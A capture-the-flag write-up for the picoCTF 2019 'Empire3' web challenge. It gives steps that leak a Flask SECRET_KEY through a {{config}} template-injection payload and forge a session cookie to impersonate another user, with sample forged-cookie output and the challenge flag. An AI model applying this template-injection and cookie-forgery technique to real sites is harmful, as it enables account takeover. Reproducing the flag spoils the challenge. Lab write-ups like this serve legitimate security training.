# Empire3

## Problem

> Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans? <https://2019shell1.picoctf.com/problem/45132/> (link) or <http://2019shell1.picoctf.com:45132>

* [Website](https://2019shell1.picoctf.com/problem/45132/)

## Solution

1. Create an account and sign in
2. Use EditThisCookieto get flask session cookie
3. Create a todo of `{{config}}` and get the flask `SECRET_KEY` variable (used for encoding session cookies)
4. Paste `SECRET_KEY` into `secret_key` variable of attached script
5. Paste flask cookie into `regular_user_cookie` variable of attached script
6. Run script to decode cookie and paste into `cookie_dict` variable
7. Change `"user_id": "x"` to `"user_id": "2"`
8. Run script again and change cookie to the new cookie
9. Reload the page and the flag should be given

### Example Output

```
Decoded Cookie:
{'_fresh': True, '_id': '669830bc929eb8755b468ad78734441992a8275815de8e86acaefc907af730c0f014a3c1aebb5c4f81924a9e400164894ab9f21fda058f1542b5d07c5cccc5a3', 'csrf_token': '86c56031ea9ab7555bb9e367a80f6a3bf72a1c59', 'user_id': '3'}

Encoded Cookie For User 2:
.eJwlzzFqBTEMBNC7uE4h2ZIt5TKLpJVICCSw-38VcvdvyHRTDLz5bUddeX-09_a4ntne2vF57jKnygAP7Zoui9lpip1L1iAiVO0mfbEgnykp08KyQmFZrQEBBUg2Ai3dOagEtZNpEgBOEiVzrY51GrAUMnXnE1Zw7LCNDYn7quPx85Xf2yMzeMLANDXfHHbXHHOZQE0bXqsbBuvePe-8_k_09vcCf5o-3g.XaOrlQ.dWJr-X0v22Dhdt0rswb0cvI3lMk
```

### Flag

`picoCTF{cookies_are_a_sometimes_food_8038d44f}`